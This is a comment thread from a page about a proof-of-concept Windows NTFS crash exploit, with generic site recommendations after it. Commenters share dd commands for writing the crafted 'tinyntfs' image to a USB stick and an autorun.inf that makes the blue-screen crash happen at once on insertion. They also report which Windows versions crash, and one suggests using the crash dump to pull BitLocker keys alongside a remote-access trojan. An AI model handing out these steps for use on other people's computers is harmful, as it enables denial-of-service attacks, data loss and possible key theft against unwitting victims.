Comments (29)
working for me now wrote on windows with dd.exe
download from here(used beta5)
http://www.chrysocome.net/downloads/1f150e835d6bde24e2fc1c9107e8e503/dd-0.4beta5.zip
run command as admin in cmd:
dd if=tinyntfs of=\\.\d:
(note d: is the drive letter of my NTFS formatted usb stick)
as soon as you plug in the stick explorer tries to open, then instant bsod ntfs.sys is the cause.
from windows10_ntfs_crash_dos.
Creating an autotun.inf with icon=4 should crash immediately
from windows10_ntfs_crash_dos.
写入u盘成功了,但是我插在windows10上面没有反应啊,windows10提示”无法访问,文件或目录损坏且无法访问“是什么情况?
from windows10_ntfs_crash_dos.
sudo dd if=./tinyntfs of=/dev/sdb1
[sudo] password for cx:
20472+0 records in
20472+0 records out
10481664 bytes (10 MB, 10 MiB) copied, 3.76947 s, 2.8 MB/s
from windows10_ntfs_crash_dos.
can't work .how to use
from windows10_ntfs_crash_dos.
finally got the files to write to a usb with.
dd if=tinyntfs of=\.\d:
(dual \ after of= before the .
plugging in the usb after writing the drive shows up as D: in explorer with size of 9.99mb
clicking on drive says: "The file or directory is corrupt and unreadable"
nothing autoruns, no bsod.
from windows10_ntfs_crash_dos.
I tried to use dd
, but it didn't work on Windows7 Pro 6.1.7601 SP1, Build 7601 x64
.
➜ sudo dd if=./tinyntfs of=/dev/disk[N] bs=1m
N is the udisk physical device number
Output
➜ diskutil unmountDisk /dev/disk2
Unmount of all volumes on disk2 was successful
➜ sudo dd if=./tinyntfs of=/dev/disk2 bs=1m
Password:
9+1 records in
9+1 records out
10481664 bytes transferred in 2.718003 secs (3856384 bytes/sec)
➜
from windows10_ntfs_crash_dos.
Tried and not work :(
Tivadar contacted Microsoft about the issue in July 2017, but published the PoC code today after the OS maker declined to classify the issue as a security bug.
It's already fixed
from windows10_ntfs_crash_dos.
anybody succeed?
from windows10_ntfs_crash_dos.
没有啊,我就没有成功
@richard1225 I did not succeed
from windows10_ntfs_crash_dos.
@mitsukuri I get "File write failed: access denied" error with restore from file option.
from windows10_ntfs_crash_dos.
@mitsukuri formatted to fat32 usb,
and all but [system] and system volume information copied over, the stick doesnt cause the bsod
from windows10_ntfs_crash_dos.
I cannot reproduce this on latest Windows 8.1 Industry Pro either. By the age of this expoit (reported to Microsoft on July 2017) it is safe to assume that Microsoft already fixed it silently.
from windows10_ntfs_crash_dos.
dd.exe if=tinyntfs of=\\.\d: bs=1M count=10
If on Windows, you can download dd: http://www.chrysocome.net/dd
It works on Windows 10 latest build, it is apparently not fixed. Download/pull tinyfs again, it has been changed to work.
from windows10_ntfs_crash_dos.
dd.exe if=tinyntfs of=.\d: bs=1M count=10
rawwrite dd for windows version 1.0beta1 WIN64.
Written by John Newbigin [email protected]
This program is covered by terms of the GPL Version 2.
Error opening output file: 123 The filename, directory name, or volume label syntax is incorrect.
tinyntfs is in the directory the command was ran from...
running removing the .\ infront of D: gives a different error.
dd.exe if=tinyntfs of=D: bs=1M count=10
rawwrite dd for windows version 0.4beta5.
Written by John Newbigin [email protected]
This program is covered by the GPL. See copying.txt for details
read from 95 disk
nothing is on the target D: disk
from windows10_ntfs_crash_dos.
please see readme
from windows10_ntfs_crash_dos.
Make sure you pulled the last version of tinyntfs
from windows10_ntfs_crash_dos.
BootICE works. Here's the demo showing the USB drive crashing the computer after "restoring" the partition from file (Windows 7 Home Premium x64)
https://youtu.be/N6OJJR7vWlk
You have to click on the button or open the drive in Explorer for this to crash your computer, though.
from windows10_ntfs_crash_dos.
I used Bootice 1.3.3.2 x64 on Win10 and it is written * Successed *, but then when I inserted the flash drive into another PC it wrote that * there is no access to the disk. the file or folder is corrupt, reading is impossible *. It was the same with dd.exe. I used a normal 2GB disk.
UPD: I did everything. I do not know why, but it did not work on my win10 laptop (this is not the first problem by the way with which I encounter it, which is solved by other PCs).
from windows10_ntfs_crash_dos.
@Twml1500 If you have not figured out the access error yet, then you should go into the properties of the flash drive and give full access to your user (or for all) on the security and access tab. Link to the instructions in the pictures
from windows10_ntfs_crash_dos.
from windows10_ntfs_crash_dos.
You can add autorun.inf
by writing this to that file (you only need [autorun]
and icon=4
part for this to work):
[autorun]
icon=4
open=FAKEFILE.EXE
label=BSODSTICK
Then dragging the file into the drive icon on Windows 7 or by using Linux.
To test, just unplug the device and replug it if you are on Windows 7.
from windows10_ntfs_crash_dos.
@shotbyapony What is your OS? Do you have autorun.inf
?
With it, it crashes almost immediately every time, and on the same computer.
from windows10_ntfs_crash_dos.
@UnforeseenOcean will you be able to recover your windows after getting the BSOD?
from windows10_ntfs_crash_dos.
@abhimanyuZ the ntfs BSOD is a harmless hard stop error,
reboot and pc will start normally. no long term damage.
from windows10_ntfs_crash_dos.
@abhimanyuZ Yes, it's a harmless BSOD and unless there was some file that was being written it should be okay.
I sometimes use this to prevent people from accessing my computer by plugging this in when I leave my seat for a long time.
from windows10_ntfs_crash_dos.
@UnforeseenOcean @XxTWMLxX
Then in which way this exploit can actually cause trouble to victim?
from windows10_ntfs_crash_dos.
@abhimanyuZ The crash occurs immediately when the OS recognizes and tries to access the disk in question; it can be used as a way to cause denial-of-service.
Now I wonder though, will this work with virtual disk solutions?
from windows10_ntfs_crash_dos.
@abhimanyuZ it can be used to generate a crash dump file that can contain the bitlocker encryption key in it, with enough knowledge and time you can extract that info and get the bitlocker password, then be able to steal and use the pc/data on it. just one of the many uses, it can also be combined with malware like a rat, rat installs,bsod happens, malicious person(s) then can remotely recover the before mentioned crash dump.
from windows10_ntfs_crash_dos.
Related Issues (6)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from windows10_ntfs_crash_dos.